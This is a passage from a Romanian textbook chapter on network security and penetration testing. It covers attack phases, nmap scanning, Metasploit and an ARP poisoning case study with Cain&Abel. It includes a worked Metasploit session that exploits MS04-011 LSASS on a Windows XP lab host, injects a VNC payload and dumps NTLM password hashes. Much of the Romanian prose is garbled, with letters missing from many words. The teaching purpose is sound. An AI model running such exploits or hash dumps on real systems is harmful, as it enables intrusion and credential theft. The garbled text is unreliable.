u o u elte p e u t a e, pi g şi altele.
Scanarea este o etapă i po ta tă pe t u ă de ele ai ulte o i o pletează i agi ea
o ţi ută pâ ă atu i. A ti ităţile î t ep i se i lud s a a ea de po tu i folosi d nmap cu toate
tipurile sale: SYN, Connect, ACK hia şi Idle Scanning, maparea ACL-urilor de pe firewall-uri
cu firewalk şi hping, s a ă i de ul e a ilităţi u Nessus, Retina, CANVAS, CORE Impact,
ide tifi a ea p oto oalelo , se i iilo şi siste elo de ope a e utilizate şi î e ă i de
enumerare prin NetBios Null Sessions, LDAP, SNMP, DNS Zone Transfer.
Atacul. U ătoa ea fază este ea ai i te esa tă deoa e e i pli ă î e a ea
ata ato ului de a o ţi e a esul. Pe aza i fo aţiilo o ţi ute a te io e hipa de audit
eează u p ofil de se u itate al eţelei şi u pla de ata . Î a easta fază su t o sultate de
o i ei aze de date pu li e pe t u o ţi e ea exploit-urilor, sau sunt dezvoltate propriile
exploit-u i şi u elte de ata pe t u o p o ite ea siste elo ţi tă. Cele ai popula e aze de
date sunt:


http://www.milw0rm.com

http://www.packetstormsecurity.org/

http://osvdb.org/
http://www.securityfocus.com/
366 | ‘ e ţ e l e L o a l e
La sa ea u ui ata folosi d i fo aţiile de pe a este site-u i i pli ă î o ti ua e u

olu de u ă su sta ţial di pa tea ata ato ului, deoa e e odul e iste t t e uie de ele
ai ulte o i odifi at fie pe t u ă este g eșit î od i te ţio at, fie pe t u ă u
o espu de pe fe t e siu ii şi su e siu ii se i iului a e t e uie o p o is , apoi t e uie
o pilat şi a alizat pe u ediu de test. U ul di t e ele ai o e a ile odu i de a po i
u ata se azează pe folosi ea u ui framework dedicat; cele mai folosite astfel de platforme
sunt Metasploit (Open-Source), Canvas sau Core Impact1.
Ata u ile pot fi di e ţio ate asup a u ătoa elo lo aţii a e o ţi ul e a ilităţi: siste e
de ope a e, se i ii sau apli aţii.
Atacurile asupra sistemelor de operare sunt de mai multe tipuri. Un exemplu de atac
dato at ul e a ilităţilo di odul O“ este spargerea RPC/SMB pe Windows e ploatată de
viermi celebri precum Blaster sau Sasser.
Spargerea parolelor în cazul obtinerii hash-urilor (prin sniffing, de exemplu) este un alt tip
de ata asup a O“. Metodele de ata asup a pa olelo i lud ata u i de di ţio a p i
testarea unor cuvinte dintr-o listă p edefi ită , brute-force î e a ea tutu o posi ilităţilo de
x caractere), hibride (pornind de la u di ţio a şi s hi â d/adăugâ d âte a a a te e ,
rainbowcrack (brute-force dar cu liste precalculate), reversarea algoritmului (cisco type7,
Ado e PDF, Mi osoft Wo d sau eșe î a esta WEP . U eltele ele ai u os ute su t:
L0phtCrack, john, hydra, rainbowcrack.
Privilege escalation i pli ă posi ilitatea u ui utilizato li itat de a o ţi e p i ilegii
superioare, de obicei de administrator. Câteva dintre cele mai relevante exemple includ un
uleti de şti i di de la Mi osoft a e a u ţa e iste ţa u o eşe î kernel
http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx, sau un exploit
di august a e pe ite es alada ea „level 15 a i pe t u o i e e siu e de Cis o
IOS: http://www.securiteam.com/exploits/5UP0W0AP5E.html.
Pe aza ul e a ilităţilo des ope ite de-a lungul timpului, printre cele mai populare
ata uri dire țio ate ătre ser i ii se u ă ă ata u ile asup a se e elo DN“, Ope ““H, We :
Apa he/ II“, şi ata u ile asup a azelo de date: Mi osoft “QL “e er, MySQL, etc.
Majoritatea ata urilor î potri a apli ațiilor asupra din ultimii ani sunt concentrate asupra
apli aţiilo We şi se azează pe u ătoa ele ul e a ilităţi ale a esto a:
 Cross-Site Scripting (XSS);
 Cross-Site Request Forgery (XSRF);
 Cross-Site Tracing (XST);
 Injectare (SQL, LDAP, XPATH);
 Server-Side Includes (SSI);
 Buffer Overflows;
 Session Hijacking;
 Directory Traversal;
 Es alada e o izo tală a p i ilegiilo ;
 Es alada ea e ti ală a p i ilegiilo ;
 Vul e a ilităţi spe ifi e teh ologiilo folosite: Java, JavaScript, Flash, ActiveX.
Ata urile la i elul rețea se azează pe e ploata ea u ei ul e a ilităţi î p oto oalele
utilizate î eţeaua desti aţie şi pot i pli a:
 I t odu e e de e hipa e t elegiti e, „rogue şi ula ea u o p oto oale di seria: HSRP,
DTP, “TP, VTP, O“PF, EIG‘P, DHCP pe t u a ipula ea t afi ului şi o oli ea ăsu ilo de
securitate existente. Zebra este o apli aţie Li u a e poate fi utilizată pe t u o pa te di t e
acestea, pentru altele fiind nevoie de echipamente dedicate;
1
Pu te de efe i ţă pe t u ata u ile de siste : “AN“ Top http://www.sans.org/top20/; pentru
apli aţii e : OWA“P Top http://www.owasp.org/index.php/Top_10_2007.
 Ata u ile p i “NMP e siu ile şi ;

 ARP Poisoning (uneltele cunoscute sunt cain, ettercap, dsniff).
Social Engineering
I gi e ia so ială social engineering ep ezi tă pe suada ea oa e ilo de a fu iza
i fo aţii sau alt tip de sp iji pe t u a âştiga a es eauto izat la u siste . Teh i ile de
social engineering i lud: i ti ida e, pe suasiu e, poza ea a i ti ă e a e e oie de ajuto
sau, di pot i ă, ea ea u ei situaţii î a e i ti a a e e oie de u ajuto pe a e ata ato ul
se ofe ă să îl dea.
Impersonarea unui utilizator legitim, a unei persoane influente sau a personalului de
suport tehnic sunt tehnici foarte puternice. Eavesdropping ep ezi tă teh i a de as ulta e a
u ei o e saţii p i ate fă ă a ei i pli ati să ştie ă su t as ultaţi. Dumpster Diving i pli ă
s o o i ea tutu o estu ilo u ei o ga izaţii pe t u ole ta ea u o i fo aţii. Shoulder
Surfing este p o edu a p i a e u ata ato u ă ește o ito ul u ei alte pe soa e pe t u a-
i u ă i a ti ităţile. Tailgating şi Piggybacking su t teh i i de păt u de e î i te io ul u o
sup afeţe p otejate de uși sau a ie e u a tele, espe ti p i a gaja ea î t -o o e saţie u
o pe soa ă e deţi e a esul.
Reverse Social Engineering este o altă etodă o sa ată. Ata ato ul o i ge pe alţii să
apeleze la sp iji ul său, de ele ai ulte o i o st ui d u pe so aj fi ti la a e ţi tele o
apela pentru rezolvarea unor probleme. De cele mai multe ori atacatorii prin social
engineering o utiliza ijloa e de o u i aţie i fo atice precum instant messaging, e-mail,
telefon, SMS şi o o i a a este teh i i u alte ata u i p e u dez olta ea u o t oie i,
escaladarea privilegiilor, crearea unor site-u i de tip „phishing , et .
E ti derea i flue ței. Odată e u ata ato a o p o is un sistem, acesta va verifica
noile orizonturi care i-au fost des hise. Da ă a fost posi ilă o p o ite ea u ei staţii di
i te io ul u ei eţele, este posi il a de ai i să fie la sate oi ata u i ăt e staţiile
administratorilor. Astfel, echipa de audit a epeta a ti ităţile de ole ta e a datelo , s a a e
şi e e tual a ealiza oi ata u i di oua poziţie. Î azul spa ge ii u o pa ole, ata ato ul a
a esa e hipa e te şi a alte a o figu aţiile pe t u a ea p e isele u ui ou ata .
Mentinerea accesului. Atacatorul va folosi tehnici precum instalarea de rootkit-uri, troieni,
ea ea de a ale de o u i aţie as u se covert) sau inverse, dezactivarea firewall-ului şi
adăuga ea de o tu i ad i ist ati e pe t u a e ţi e u a es sta il pe iito ătre un sistem
compromis.
Acoperirea urmelor i lude ște ge ea log-urilor de pe sistem, identificarea punctelor care
a fi putut ge e a ale te, p e u e hipa e tele de tip ID“/IP“, şi o p o ite ea a esto a,
u ate de o e e tuala î lătu a e a ale telo ge erate.
Denial-of-Service ep ezi tă o st ategie alte ati ă a ata ato ului î situaţia î a e u
eușește să o ţi ă a esul. Î azul spe ifi al u ui test de pe et a e a este teste o fi fă ute
doa da ă ele su t e ute î od e pli it de ăt e o pa ia auditată. Teh i ile de
o p o ite e a fu ţio alităţii i lud:
Resource Starvation: epuizarea resurselor unui sistem prin cunoscutele atacuri de tip SYN
Flood, epuizarea resurselor sistemului de operare, etc.
Bandwidth Starvation, asi ilat oţiu ii de flood: i pli a t a s ite ea u ui t afi susţi ut
ai a e de ât desti aţia poate a epta, o upâ d î t eaga a da pe a e ţi ta o poate folosi.
Ata u i dist i uite DDo“ . A este ata u i i pli ă u u ă a e de staţii o p o ise î
p eala il a e la sează î od si o izat a elași ata ăt e o ţi tă o u ă.
368 | ‘ e ţ e l e L o a l e
10.3 Utilitare pentru asigurarea securităţii

10.3.1 Nmap
E istă u e oase apli aţii de s a at po tu ile dispo i ile, shareware sau freeware, una
dintre cele mai populare fiind nmap. Dato ită popula ităţii de a e se u u ă utilita ul nmap în
rândul administratorilor de sisteme Linux (www.insecure.org/nmap , apli aţia a fost po tată
şi pe platfo e Wi do s sourceforge.net/projects/nmapwin).
N ap i ple e tează ai ulte etode de s a a e, putâ d ofe i i fo aţii desp e
po tu ile des hise, da şi desp e po tu ile e pli it filt ate. Î plus faţă de i fo aţiile
referitoare la serviciile rulate, nmap pu e la dispoziţia ad i ist ato ului de eţea etode de
aflare a versiunii sistemului de operare, versiunile serviciilor acti e, utilizato ii e ulează
a este se i ii, p e u şi ulte alte i fo aţii ele a te.
P i t e tipu ile i po ta te de s a a e, şase se efe ă la s a a ea po tu ilo TCP, u ul la
s a a ea po tu ilo UDP şi u ul la o ito iza ea o e ti ităţii, a eastă ulti ă etodă
î e â d să dete i e doa da ă staţia desti aţie este a ti ă şi da ă se poate aju ge la ea. O
a aliză detaliată a etodelo de s a a e p esupu e o p eze ta e a â pu ilo de o t ol di
a tetul TCP, p eze ta e e depăşeşte s opul a estui apitol.
Di t e etodele de s a a e pe t u po tu i TCP, si gu a dispo i ilă utilizato ilo
ep i ilegiaţi este TCP o e t. TCP o e t î ea ă des hide ea u ei o e iu i ăt e po tul
ţi tă; da ă apelul siste o e t euşeşte, î sea ă ă po tul este des his, altminteri,
î sea ă ă po tul este efolosit, sau filt at de u firewall.
TCP “YN este odul i pli it de s a a e pe t u utilizato ii p i ilegiaţi. “e t i ite u pa het
“YN ăt e aşi a a e este s a ată. Î azul î a e se p i eşte d ept ăspu s u pa het
“YN|ACK î sea ă ă e istă u se e e as ultă pe a est po t, da da ă pa hetul de ăspu s
este u pa het ‘“T, î sea ă ă po tul î auză u este des his. Da ă u se p i eşte niciun
ăspu s po tul este o side at a fii d filt at de u firewall.
TCP “YN se azează pe t i ite ea de pa hete “YN, eea e p esupu e d eptu i de
ad i ist ato . Di a est oti , a est od u este a esi il utilizato ilo ep i ilegiaţi.
Două opţiu i de s a a e i po ta te su t -sV şi -O. P i a di t e a este opţiu i ofe ă
infor aţii desp e e siu ea se i iilo e as ultă pe po tu ile des hise, î e e e opţiu ea -
O ofe ă i fo aţii desp e siste ul de ope a e i stalat, p e u şi ti pul de la ulti a
restartare.
kiwi:~# nmap -sV -O 141.85.37.53
Starting nmap 3.55 ( http://www.insecure.org/nmap/ ) at 2004-08-27 17:23 EEST
Interesting ports on dhcp-53.cs.pub.ro (141.85.37.53):
(The 1659 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 (protocol 1.99)
Device type: general purpose
Running: Linux 2.4.X|2.5.X|2.6.X
OS details: Linux 2.5.25 - 2.6.3 or Gentoo 1.2 Linux 2.4.19 rc1-rc7)
Uptime 0.105 days (since Fri Aug 27 14:52:12 2004)
Nmap run completed -- 1 IP address (1 host up) scanned in 11.840 seconds
Un lucru e u t e uie t e ut u ede ea este faptul ă p o esul de s a a e de po tu i

poate du e la o î ă a e se ifi ati ă a siste ului, o ope aţie de o ito iza e putâ d a ea
efe tele u ui ata Do“. Pe t u a o t ola i pa tul s a ă ii de po tu i asup a desti aţiei, ap
foloseşte u u ă de şase etode de te po iza e timing) a procesului de scanare:
Paranoid, Sneaky, Polite, No al, Agg essi e şi I sa e. Metoda i pli ită este Normal, şi
u ă eşte ula ea ât ai apidă a s a ă ii fă ă a î ă a eţeaua sau a pierde porturi. Primele
t ei etode su t ult ai le te şi foloses s a ă i se ializate, î e e e ulti ele două se
azează pe s a ă i pa alele, da î s hi pot pie de u ele di t e po tu ile des hise.
Pe t u se e e u o î ă a e a e, ai ales da ă a estea î depli es fu ţii iti e,

metodele recomandate de scanare sunt Paranoid, Sneaky şi Polite, în vreme ce pentru
s a a ea pe iodi ă a u ui u ă a e de staţii de lu u etodele Aggressive şi Insane se pot
dovedi mult mai potrivite, în special pent u eţele u o e iu i foa te apide.
Fu țio area N ap
Scanarea ACK are drept principal scop determinarea tipurilor de reguli de filtrare folosite
de un firewall e p otejează desti aţia. La fi alul u ei astfel de s a ă i se poate afla da ă u
port destinaţie este filt at de o egulă azată pe o ito iza ea stă ilo o e iu ilo sau u.
Î a est s op, s a a ea ACK t e uie ulată î o ju ţie u s a a ea TCP “YN. Mai e a t,
pe t u u po t e a fost dete i at a fii d po t filt at î u a u ei s a ă i TCP SYN, se va rula
s a a ea ACK pe t u a dete i a tipul egulii de filt a e folosită.
Pe t u a e ifi a fu ţio a ea s a ă ii, vor fi u ă ite pa hetele t i ise î eţea pe t u
azu i: po t î his şi po t des his.
Cazul 1. Portul 10000 este închis. Procesul de scanare a traficului prin:
kiwi:~# tcpdump -i eth1 tcp port 10001
Scanarea portului 10001 prin metoda TCP SYN se va face cu comanda:

cursuri:~# nmap -sS -p 10001 -P0 -n 141.85.37.145
Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )
The 1 scanned port on (141.85.37.145) is: closed
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
Pa hetele t i ise î eţea au fost p i se de tcpdump:

17:11:42.860449 IP cursuri.cs.pub.ro.54403 > kiwi.cs.pub.ro.10001: S
2570971707:2570971707(0) win 2048
17:11:42.860549 IP kiwi.cs.pub.ro.10001 > cursuri.cs.pub.ro.54403: R 0:0(0) ack
2570971708 win 0
‘ezultatul s a ă ii u ACK-u i a fi u ăto ul:

cursuri:~# nmap -sA -p 10001 -P0 -n 141.85.37.145
The 1 scanned port on (141.85.37.145) is: UNfiltered
“ a a ea de pa hete a i te eptat pa hete pe t u po tul î auză: seg e tul ACK t i is

de nmap şi seg e tul ‘“T t i is d ept ăspuns.
17:18:04.102979 IP cursuri.cs.pub.ro.38388 > kiwi.cs.pub.ro.10001: . ack 1214695285 win
4096
17:18:04.103089 IP kiwi.cs.pub.ro.10001 > cursuri.cs.pub.ro.38388: R
1214695285:1214695285(0) win 0
Cazul 2. Portul deschis va fi simulat prin comanda nc:

kiwi:~# nc -l -p 10000
‘ezultatul s a ă ii ACK a fi a elaşi a şi î azul po tului î his, dife e ţe apă â d doa î

scanarea TCP SYN:
cursuri:~# nmap -sS -p 10001 -P0 -n 141.85.37.145
Interesting ports on (141.85.37.145):
Port State Service
10001/tcp open unknown
Rezultatul tcpdump va fi:

17:19:29.123875 IP cursuri.cs.pub.ro.63326 > kiwi.cs.pub.ro.10001: S
680066281:680066281(0) win 3072
370 | ‘ e ţ e l e L o a l e
17:19:29.124006 IP kiwi.cs.pub.ro.10001 > cursuri.cs.pub.ro.63326: S

1412873701:1412873701(0) ack 680066282 win 5840 <mss 1460>
17:19:29.124164 IP cursuri.cs.pub.ro.63326 > kiwi.cs.pub.ro.10001: R
680066282:680066282(0) win 0
10.3.2 Metasploit
P i t e utilita ele de e alua e a ul e a ilităţilo siste elo se u ă ă Metasploit, Nessus,
sau Ettercap. În continuare se va ilust a fu ţio a ea u o astfel de p oie te p i p eze ta ea
Metasploit.
Câștigăto ul u ei p estigioase edalii Best of Open Source Software Awards 2008 la
se ţiu ea de “e u itate, p oie tul Metasploit pu e la dispoziţia o u ităţii e a is e
a a sate pe t u dez olta ea, testa ea şi la sa ea ata u ilo î pot i a siste elo i fo ati e.
Fu ţia de ază a u ui framework este de a ea o platfo ă o siste tă pe t u ati ge ea
unui obiectiv. Metasploit o ţi e î plus o ole ţie de u elte, biblioteci, odule şi i te feţe
folosite î p eu ă pe t u e ploata ea eșelo de se u itate. Ve siu ea . este s isa î Ruby,
iar compo e tele î C şi Asse le , î pa adig a open-source, ofe i d atât o ază solidă
pe t u dez olta ea p op iilo odule, ât şi po ta ilitatea framework-ului pe o ga ă la gă de
siste e de ope a e e i lud Wi do s, Li u şi Ma O“.
Metasploit poate i te a ţio a u utilizato ul folosi d atât li ia de o a dă, ap e iată de
utilizato ii a a saţi, ât şi î t -u ediu g afi , su fo a u ei i te feţe e sau a u ei
apli aţii GUI stand-alone, e o a dat p i elo o ta te u apli aţia.
10-3: Metasploit GUI
U a di t e ele ai f e e te utiliză i ale Metasploit u ă eşte o ţi e ea u ui shell pe

siste ul ţi tă, p i e ploata ea u ei eșe de se u itate î t -unul dintre serviciile active;
a esta este totodată el ai f ecvent obiectiv al unui atacator.
Realizarea acestui scenariu cu Metasploit p esupu e pa u ge ea u ătoa elo etape:

Ide tifi a ea po tu ilo des hise şi a se i iilo a ti e pe aşi a ţi tă. “ a a ea de po tu i
se poate face de exemplu cu nmap. Intr-o pa alelă u asalta ea u ei fo tă eţe, a est pas poate
fi ase ă at u ide tifi a ea sup afeţelo e puse ale etăţii: i t a ea p i ipală şi ea

se u da ă, tu u ile de eghe, fe est ele, et .
Ve ifi a ea p eze ţei ul e a ilităţilo pu li e pe po tu ile des operite anterior. Acest pas
se poate face prin tehnici de „banner grabbing , „os fingerprinting , ide tifi a ea e siu ii
se i iului şi o ela ea a esteia u o ază de date de ul e a ilităţi, sau p i s a a ea u
Nessus. Etapa se asea ă ă u ide tifi a ea zonelor cunoscute ca fiind slabe: poarta principala
u este a fo sată şi poate fi spa tă u u e e , sau u a u it zid poate fi dă â at u u
anumit tun.
Ide tifi a ea odulului o espu zăto de „exploit di Metasploit şi o figu a ea a estuia:
adresa IP desti aţie, e siu ea siste ului de ope a e, et . A easta etapă se poate ase ă ă u
identificarea armamentului ce va fi folosit: tipul de tun sau de berbec.
Alegerea unui „payload şi o figu a ea opţiu ilo a estuia. Payload-ul ep ezi tă
î ă ătu a ata ului, odul a e a fi e e utat î u a e ploată ii ul e a ilităţii alese, od
a e de ide a e a fi ezultatul ata ului. A esta poate a ia de la o ţi e ea u ui shell pe
siste ul ţi tă pâ ă la ad i ist a ea a estuia p i VNC sau p i p odu e ea u ui Denial of
Service.
Ulti ul pas este a ela al la să ii ata ului şi al e ifi ă ii ezultatului o ţi ut. Î azul u ui
ezultat poziti , ata ato ul poate î e a să îşi e ti dă i flue ţa, să îşi asigu e a esul iito , să
ştea gă u ele sau să îşi es aladeze p i ilegiile, î fu ţie de situaţie.
Ve siu ea a tuală u ă ă peste două sute i i ze i de exploit-uri acoperind numeroase
bug-u i de la siste e de ope a e Wi do s, Li u , Cis o IO“, et pâ ă la se i ii II“, Apa he,
“QL “e e şi apli aţii: browsere, firewall-uri.
U u ă de payload-u i su t dispo i ile pe t u o ţi e ea a esului, ia fu ţiile
a esto a i lud: po i ea u ui se i iu pe siste ul ţi tă şi o e ta ea la a esta bind),
po i ea u ui se i iu şi o figu a ea a estuia să se o e teze î apoi la staţia ata ato ului
pe t u a e ita est i ţiile de firewall (reverse connect . Alte fa ilitaţi a a sate ale payload-
u ilo su t: tu ela ea o e iu ilo peste p oto olul HTTP sau peste u la e ““L i d şi
e e se , pă ăli ea siste elo ID“/IP“, et . ‘ezultatul fi al poate fi o ţi e ea u ui shell, a unei
o e iu i VNC, adăuga ea u ui utilizato , e e uta ea de o e zi la dista ţă, sau î ă a ea şi
lansarea unui DLL dezvoltat de atacator.
Pentru compromiterea sistemelor Windows, Metasploit ofe ă posi ilitatea i je tă ii
payload-ului (Win32 DLL Injection î spaţiul de ad ese ale p o esului e ploatat, de u de este
lansat ca thread sepa at. Pă ăli ea a ti i uşilo şi i e iste ta u elo pe dis su t doa două
dintre avantajele acestei metode.
Un payload deose it este „Meterpreter , u shell creat special pentru hacking. Acesta este
conceput special pentru a rezolva problemele clasice ale shell-urilor de sistem: poate evada
nativ din mediile chroot-ate, u la sează u p o es ou, i se as u de î spaţiul de ad esă al
altui p o es, şi pu e i ediat la dispoziţia ata ato ului u set foa te pute i de o e zi
o se e te i depe de t de platfo ă, pe a e alt i te i a esta a t e ui să le t a sfe e
printr-u alt a al. Fu ţio alitatea lui Meterpreter este odula ă şi se azează pe e te sii.
Astfel stdapi o ţi e a es u ifi at la fu ţii de siste , de eţea, a ipula ea p o eselo ,
etc., iar priv permite accesul facil la hash-u ile pa olelo Wi do s NTLM , şi la utilita e
pentru modificarea amprentelo de ti p ale fişie elo .
stdapi o ţi e u elte pe t u a ipula ea siste elo de fișie e cat, edit, ls, cd, pwd,
do load şi upload pe t u t a sfe ul de fișie e î t e staţia de ata şi ţi tă di e t p i
meterpreter, et , a ipula ea fu ţiilo de eţea ipconfig, portfwd pentru tunelarea
conexiunilor de pe sistemul compromis mai departe, route pentru modificarea tabelei de
uta e , a fu ţiilo “O e e ute poate la sa u p o es as at p i DLL Injection, getpid,
372 | ‘ e ţ e l e L o a l e
getuid, kill, ps, reg pentru manipularea regişt ilo sau a i te feţei g afi e idletime şi
uictl pe t u a ti a ea/deza ti a ea i te a ti ităţii siste ului u utilizato ul legiti .
Alte fa ilitaţi i te esa te ale Metasploit i lud posi ilitatea la să ii exploit-urilor printr-un
la ţ de se e e p o testat de ăt e o u itate u de se e e pe t u as a ea su sei şi
modulul autopwn care permite atacarea unui subnet întreg din doar câteva comenzi prin
integrarea cu nmap şi auto atiza ea p i ilo pat u pași des iși a te io .
Un exemplu de vulnerabilitate în protocolul SMB (File Sharing) pe Windows XP este
prezentat mai jos:
1. Scanarea de porturi (nmap) . “ a a ea de ul e a ilităţi
nmap -sS 192.168.128.5

Starting Nmap 4.50 (http://insecure.org )
at 2008-09-11 19:04 E. Europe Daylight
Time
Interesting ports on 192.168.128.5:
Not shown: 1706 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
MAC Address: 00:0C:29:C8:A3:02 (VMware)
Nmap done: 1 IP address (1 host up)

scanned in 1.375 seconds
Un exemplu de output Metaspoit este prezentat mai jos:

>> search ms04_011 // CAUTAREA EXPLOIT-ULUI
[*] Searching loaded modules for pattern 'ms04_011'...
Exploits
========
Name Description
---- -----------
windows/smb/ms04_011_lsass Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/ssl/ms04_011_pct Microsoft Private Communications Transport Overflow
>> use windows/smb/ms04_011_lsass
>> show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targetting
1 Windows 2000 English
2 Windows XP English
>> set TARGET 2 // CONFIGURAREA OPTIUNILOR EXPLOIT (OS TINTA)
TARGET => 2
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Exploit target:
Id Name
-- ----
2 Windows XP English
>> set RHOST 192.168.128.5 // OPTIUNE EXPLOIT (IP TINTA)
RHOST => 192.168.128.5
>> show advanced
Module advanced options: .... (OMISE PENTRU BREVITATE)
>> show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
.............. (OMISE PENTRU BREVITATE)
>> set PAYLOAD windows/vncinject/bind_tcp // PAYLOAD INJECTARE SERVER VNC
PAYLOAD => windows/vncinject/bind_tcp
>> exploit // LANSARE EXPLOIT
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
>> exploit // BUG IN EXPLOIT (CONTINUAM)
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-
00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (327693 bytes)...
[*] Upload completed.
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[*] VNC Server session 2 opened (192.168.128.2:1875 -> 192.168.128.5:4444)
[*] The DCERPC service did not reply to our request
>> sessions –l // LISTARE SESIUNI DESCHISE
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.128.2:1831 -> 192.168.128.5:4444 // SESIUNE MAI VECHE
2 VNC Server 192.168.128.2:1875 -> 192.168.128.5:4444 // REZULTAT
>> sessions -i 1
[*] Starting interaction with 1...
>> use Priv
Loading extension priv...
success.
>> help // OUTPUT OMIS PENTRU BREVITATE
>> hashdump // DUMP NTLM HASH
Administrator:500:81fc70764e28d07e17306d272a9441bb:1588a8ad682c772251524a40766e9918:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5890ebd067d1edf9d64624dfdc26c511:5f1756c53701b2d0aa8391848d58914a:::
stormy:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0
:1002:aad3b435b51404eeaad3b435b51404ee:25c43e16e9e62c3f615ee824ab5fd083:::
10.4 Studii de caz

10.4.1 ARP Poisoning
Unul dintre cele mai î tâl ite şi popula e ata u i î t -o eţea o utată îl ep ezi tă ata ul
ARP Poisoning. “ it hul li itează ult apa itatea ata ato ilo de a o ţi e i fo aţii di
t afi ul i te al eţelei u ajuto ul u ui packet sniffer. Totuşi, p i ARP poisoning se poate
i te epta t afi ul di t e o i a e două al ulatoa e, hia şi î t -o eţea e foloseşte s it hu i.
După u suge ează şi u ele, a est ata este fo at di două pă ţi: p i a pa te o stă î
a ipula ea ta elelo A‘P a staţiilo ţi tă, fii d u ată apoi de uta ea t afi ului ăt e
374 | ‘ e ţ e l e L o a l e
desti aţia o e tă. Da ă a est lu u u se î tâ plă, este p odus u ata Do“ î t e ele două
staţii i ti ă man-in-the-end).
ARP poisoning este p o esul p i a e staţiile afe tate di t -o eţea o utată o aju ge
să posede i t ă i e o ate î ta ela A‘P. Mai e a t, î lo ul o espo de ţelo fi eşti î t e
di e sele ad ese IP şi ad esele MAC ale elo lalte staţii di a eeaşi eţea, o staţie supusă u ui
atac bazat pe ARP poisoning va avea în tabela ARP doar asocieri între adrese IP ale staţiilo di
a eeaşi eţea lo ală şi o si gu ă ad esă MAC – î ge e al ea a staţiei e a i iţiat ata ul.
Î ele e u ează se va des ie pas u pas i iţie ea u ui astfel de ata , î t -o eţea u
staţii, folosi d utilita ul Cain&Abel (http://www.oxid.it/cain.html). “e do eşte
i te epta ea t afi ului di t e staţiile A şi A de ăt e staţia A ata ato ul .
A3
10.1.1.4
A1 A2
10.1.1.2 10.1.1.3
10-4: Topologia rețelei
Î ai te de i iţie ea efe ti ă a a estui atac, trebuie configu aţi a u iţi pa a et i e vor

ajuta î des ope i ea staţiilo di eţea şi î de ide ea asup a ă o staţii se a la sa ata ul.
Pe t u a easta, p i ul pas îl ep ezi tă po i ea sniffer-ului şi alege ea plă ii de eţea pe a e
se va începe captura de pachete.
10-5: Alegerea plă ii de rețea şi por irea s iffer-ului
După po i ea s iffe -ului, u ăto ul pas îl ep ezi tă des ope i ea staţiilo di eţea.
Pentru ca pachetele capturate să poată fi utate ăt e desti aţia o e tă, t e uie să
u oaşte aso ie ile IP-MAC ale staţiilo di eţea, ata ul fii d i posi il fă ă a estea. A est
lu u se ealizează p i li k d eapta şi alege ea opţiu ii „“ a MAC Add esses .
10-6: “ a area rețelei
Î u a s a ă ii eţelei se des ope ă staţiile . . . default gateway), 10.1.1.2 (A1),

. . . A , ât şi ad esele MAC o espu zătoa e fie ă eia di t e ele.
10-7: Rezultatul s a ării rețelei
Î figu a de ai jos, pe t u sele ta ea staţiilo i ti ă se va alege din bara de jos tab-ul

„AP‘ şi apoi uto ul „+ di a a de sus.
376 | ‘ e ţ e l e L o a l e
10-8: Alegerea stațiilor i ti ă
Î ţelesul sele ţiei de ai sus este u ăto ul: t afi ul este i te eptat î t e staţia e a e
ad esa IP . . . şi staţia e a e ad esa IP . . . , î a ele di e ţii. Î a est o e t
dispu e de toate i fo aţiile e esa e i iţie ii ata ului şi de un utilitar foarte puternic, ce va
la sa ata ul p i si pla apăsa e a uto ului „AP‘ .
10-9: Lansarea atacului
“e o se ă î figu a de ai sus o to iza ea pa hetelo e t e p i staţia ata ato ului

precu şi di e ţia î a e ele su t utate. Î azul î a e, pa hetele u su t utate ăt e
desti aţia o e tă, u e ele di oloa a „Packets u su t egale, putâ du-se crea astfel un
ata Do“ pe t u staţiile i ti ă, da a e este uşo dete ta il. “e poate î tâmpla ca, în unele
azu i, ata ul să se î heie u su es doa pe t u u a di staţii ata ul u euşeşte pe t u o
staţie e a e defi ite i t ă i A‘P stati e . Î a est az, se va observa u ă ul pa hetelo utate
crescând doar într-o si gu ă di e ţie, s iffer-ul p elu â d doa ju ătate di t afi ul aşteptat.
Dat fii d faptul a i t ă ile î t -o ta elă A‘P e pi ă, se pune problema da ă faza i iţială de
i u da e u pa hete fi ti e t e uie epetată o ti uu. ‘ăspu sul u este hia atât de uşo de
dat pentru ă, deşi soluţia i u dă ii o ti ue a eţelei u pa hete fi ti e asigu ă fu ţio a ea
staţiei ata ato a p o t a spa e t, poate totuşi ea u overhead se ifi ati , u ă ul de
pa hete fi ti e t i ise a ii d u păt atul u ă ului de staţii a ti e.
Implicit, Cain trimite pachete ARP false la fiecare 30 de secunde, timp ce poate fi
o figu at di e iul „Configure . Tot de ai i, se pot s hi a ad esele IP su să şi MAC su să,
î s opul as u de ii ide tităţii ata ato ului.
10-10: Parametrii de configurare
10.4.2 Firewalking
